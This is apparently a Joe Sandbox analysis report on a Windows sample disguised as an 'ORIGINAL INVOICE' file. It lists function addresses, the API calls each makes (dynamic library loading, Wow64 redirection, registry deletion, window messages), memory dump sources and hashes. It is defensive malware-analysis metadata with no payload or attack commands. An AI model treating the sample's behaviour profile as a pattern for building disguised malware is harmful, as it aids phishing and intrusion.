                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 9fcdc74d6d1ada5f29e42694d55edeb402054dcd77d6beb6a8543803785166f8
                                                              • Instruction ID: ac21c985fe8ed8e56a418e4c578cf6529d69f5615992da10834b46b1f4bf6820
                                                              • Opcode Fuzzy Hash: 9fcdc74d6d1ada5f29e42694d55edeb402054dcd77d6beb6a8543803785166f8
                                                              • Instruction Fuzzy Hash: FE11E771220209BEEF245FA4DC4AFAB376DFF89754F014218FE45A6091D7B1E825DB24
                                                              Function 00212287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00212350,?), ref: 002122A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 002122A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              • Opcode ID: e0b0b086e8415faccca65aeff647101ec5cb2ba1fc5d1f037f8cf876c7fe2f68
                                                              • Instruction ID: 777f22f53ab5f0f848d10ab784be097d7ac3ab91e52c4811f4f277cf9c5a9813
                                                              • Opcode Fuzzy Hash: e0b0b086e8415faccca65aeff647101ec5cb2ba1fc5d1f037f8cf876c7fe2f68
                                                              • Instruction Fuzzy Hash: D9E01A706B0301ABDF615F74FC8EB5A36A4BF12702F008120F50AE50A0CBB444A4CF04
                                                              Function 0021235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00212276), ref: 00212376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0021237D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              • Opcode ID: 4de63927e89a93a29768e744666fdd046cdd768ffe888fa94ff3193ca96cc451
                                                              • Instruction ID: 375d663dbc87b52fd4f6dcbbfa876e637428e9f25812b9e55282cfdcb4c1a0e1
                                                              • Opcode Fuzzy Hash: 4de63927e89a93a29768e744666fdd046cdd768ffe888fa94ff3193ca96cc451
                                                              • Instruction Fuzzy Hash: 03E0B670564301EBDB265F64FD4EB0A3AB8BB11702F144564F50DE20B0CBB894A4CE14
                                                              Function 0026AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 74e1342cf46b8b717dbe5480cb18d3b7b68c1c37614ae89a906d6741667a0a49
                                                              • Instruction ID: 7e888daf6804bca6ab80d44da4e7dee066067c4647cb8f7dd11dbfadd998c618
                                                              • Opcode Fuzzy Hash: 74e1342cf46b8b717dbe5480cb18d3b7b68c1c37614ae89a906d6741667a0a49
                                                              • Instruction Fuzzy Hash: 65E0127183561CDBCB10A790DD45DF9B3BCAB04741F1400D3B906B1151D7B59BF5AE12
                                                              Function 00252205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,002521FB,?,002523EF), ref: 00252213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00252225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              • Opcode ID: 8208feee486299c10c8e7cdc05f70dc7cea770976d2dcb6d2eecbe464ae31b4e
                                                              • Instruction ID: 4829320dcd7a0543a6acd19acd7cd88767d75369d2d032224ad67e9cce3ef804
                                                              • Opcode Fuzzy Hash: 8208feee486299c10c8e7cdc05f70dc7cea770976d2dcb6d2eecbe464ae31b4e
                                                              • Instruction Fuzzy Hash: AAD05E38820713DFC7215F24B80860177E4AF07311F104419AC49E2190DAB0D8D88650
                                                              Function 001F42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001F42EC,?,001F42AA,?), ref: 001F4304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001F4316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: 950ad1387c14fe59206d01c376ce0f1038592b78f570aa7cffa9814f4c741d17
                                                              • Instruction ID: a71eb764c8bd96491298f7c27b1fbe29c77099f32345bb25887a61f1a907cff0
                                                              • Opcode Fuzzy Hash: 950ad1387c14fe59206d01c376ce0f1038592b78f570aa7cffa9814f4c741d17
                                                              • Instruction Fuzzy Hash: C9D0A7308507239FC7204F64F80C613B7F4BF06311F004419E949D2160EBB0C8C0C710
                                                              Function 001F434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,001F41BB,001F4341,?,001F422F,?,001F41BB,?,?,?,?,001F39FE,?,00000001), ref: 001F4359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001F436B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 666982454e672f1099d4f8cee88ca9c4c3138effb56830b341866dfd79a68d29
                                                              • Instruction ID: a03261707262e0b88ebb14de278f6e5685e6295ac609ff396109597e9c2ddd1d
                                                              • Opcode Fuzzy Hash: 666982454e672f1099d4f8cee88ca9c4c3138effb56830b341866dfd79a68d29
                                                              • Instruction Fuzzy Hash: C0D0A7304547239FC7208F34F80C61377E4BF12725B014419E899D2150DBB0D8C0C710
                                                              Function 00230539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0023051D,?,002305FE), ref: 00230547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00230559
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              • Opcode ID: 62bd8fdd403b93e7a951cf4125e5dade78f82984faeb738d78954bc99ee5ace2
                                                              • Instruction ID: 0eb8e16efe7cdcc8d289bf3307d8c57718d2ab6aee9dacd546507134956dd1d1
                                                              • Opcode Fuzzy Hash: 62bd8fdd403b93e7a951cf4125e5dade78f82984faeb738d78954bc99ee5ace2
                                                              • Instruction Fuzzy Hash: 97D05E704607129FC7208F64A84860176B4AF02311F90C419E44AE2550DA74C8948A20
                                                              Function 00230564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0023052F,?,002306D7), ref: 00230572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00230584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              • Opcode ID: 11b23c00c9fdd36982ced0d2b1d1b4d6168917a45c56524e39e0eb3ddf93155b
                                                              • Instruction ID: fe6ea295c10198804fb2106f165044080a8495634a6ea3267398ed59b4e4d779
                                                              • Opcode Fuzzy Hash: 11b23c00c9fdd36982ced0d2b1d1b4d6168917a45c56524e39e0eb3ddf93155b
                                                              • Instruction Fuzzy Hash: BBD05E71520312DFC7205F24A848A0277F4AF06310F908419E849D2550DA70C4D48A20
                                                              Function 0024ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0024ECBE,?,0024EBBB), ref: 0024ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0024ECE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: caeb751316dee92face88cd7cdc1725e1cf7ab6f92bc78860989d7732c9daeab
                                                              • Instruction ID: 582f767f27c3ae79a7526d967110cd37ce1f830610170e2248177987a26f2912
                                                              • Opcode Fuzzy Hash: caeb751316dee92face88cd7cdc1725e1cf7ab6f92bc78860989d7732c9daeab
                                                              • Instruction Fuzzy Hash: E9D05E304207239FDF245F64E88860276E4BF06310B01841AA84A92191DEB0D8D08610
                                                              Function 0024BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0024BAD3,00000001,0024B6EE,?,0028DC00), ref: 0024BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0024BAFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: d5b9fee701e8ada05624af5d22b480a12bad8dea637730092f18eaf810353a72
                                                              • Instruction ID: ed22cd458491968a71506248f817c30ce4c107da5dbcb31a80223c65c626f30e
                                                              • Opcode Fuzzy Hash: d5b9fee701e8ada05624af5d22b480a12bad8dea637730092f18eaf810353a72
                                                              • Instruction Fuzzy Hash: 19D052308207139FCB396F24B848A12B6E8AF02314B00842AAC8BA2250EBB0D8D0CA10
                                                              Function 00253BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00253BD1,?,00253E06), ref: 00253BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00253BFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: c3a9d44a47083629d70680422f7a39e39f71001e74d36b36a66eaa0e2c3dab15
                                                              • Instruction ID: ef381c2a37e64558d6336b99fc6eeee3dd7f5a10a1f24a6e9faf6b6477783306
                                                              • Opcode Fuzzy Hash: c3a9d44a47083629d70680422f7a39e39f71001e74d36b36a66eaa0e2c3dab15
                                                              • Instruction Fuzzy Hash: E0D05E70420752DBC720AF60A808616BAB8AF02726B10446AE849A2150DAB0C4E48A10
                                                              Function 00229B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b760e58ad782bec6e605716ec7c0cff904ed69ffdb3446a658958425414edd19
                                                              • Instruction ID: b35e8eaff39bf9a52f911889a1a16ebc548e72965d4b4eab0ef024fba1b36c41
                                                              • Opcode Fuzzy Hash: b760e58ad782bec6e605716ec7c0cff904ed69ffdb3446a658958425414edd19
                                                              • Instruction Fuzzy Hash: FFC19C75A2022AEFDB14DFD4D884AAEB7B4FF48700F104599E805EB251D770EE91DBA0
                                                              Function 0024AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0024AAB4
                                                              • CoUninitialize.OLE32 ref: 0024AABF
                                                                • Part of subcall function 00230213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0023027B
                                                              • VariantInit.OLEAUT32(?), ref: 0024AACA
                                                              • VariantClear.OLEAUT32(?), ref: 0024AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: ebb88838ce0d18ba67b9766537de5efa00d05025b84b5f53cd6fdf61640bd43f
                                                              • Instruction ID: 3d475dd27a904a1ae267c9c30d0bb2a8b531f8fc11a087dbd2a04502f9290ff8
                                                              • Opcode Fuzzy Hash: ebb88838ce0d18ba67b9766537de5efa00d05025b84b5f53cd6fdf61640bd43f
                                                              • Instruction Fuzzy Hash: 78A176756547019FCB14EF24C881B2AB7E5BF98710F048449FA9A9B3A2CB30ED54CB86
                                                              Function 002291CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 1142aa81fb6e78b12e89cc8d25776ac1dd34f072e0a8c6b515d6fcdfdb526402
                                                              • Instruction ID: cc457f496ea6e6e22c476bb62e79fbcdc942aefbadb8fb05d0c463f350853699
                                                              • Opcode Fuzzy Hash: 1142aa81fb6e78b12e89cc8d25776ac1dd34f072e0a8c6b515d6fcdfdb526402
                                                              • Instruction Fuzzy Hash: 81516330634316BBDB24EFA5E49576EB3E9AF54310F20881FE546CB2D1DB7498E08B05
                                                              Function 0021365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: ecca778e39855c6c93e9e887cf5da4f83637e0d8e1d3f4793a6de687ce75a46c
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: 8E519AB0A20346EBDB24CF6988845DEB7E6AF60320F244729F825962D0D7719FF18F44
                                                              Function 0025C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(00C16338,?), ref: 0025C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 0025C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0025C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: d6ad9b65281e9c7d4270f6dda36d87f87d15b0186c7fff1b903d998119a50893
                                                              • Instruction ID: 5325c3d5ca0f2c243959dc7b9e82c3118f0d2a4932ce28389e631d445475aae8
                                                              • Opcode Fuzzy Hash: d6ad9b65281e9c7d4270f6dda36d87f87d15b0186c7fff1b903d998119a50893
                                                              • Instruction Fuzzy Hash: 7E519F74910205EFCF10DF68D8809AE7BB9FF44721F608259F925AB290E730ED95CB94
                                                              Function 0022C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0022C462
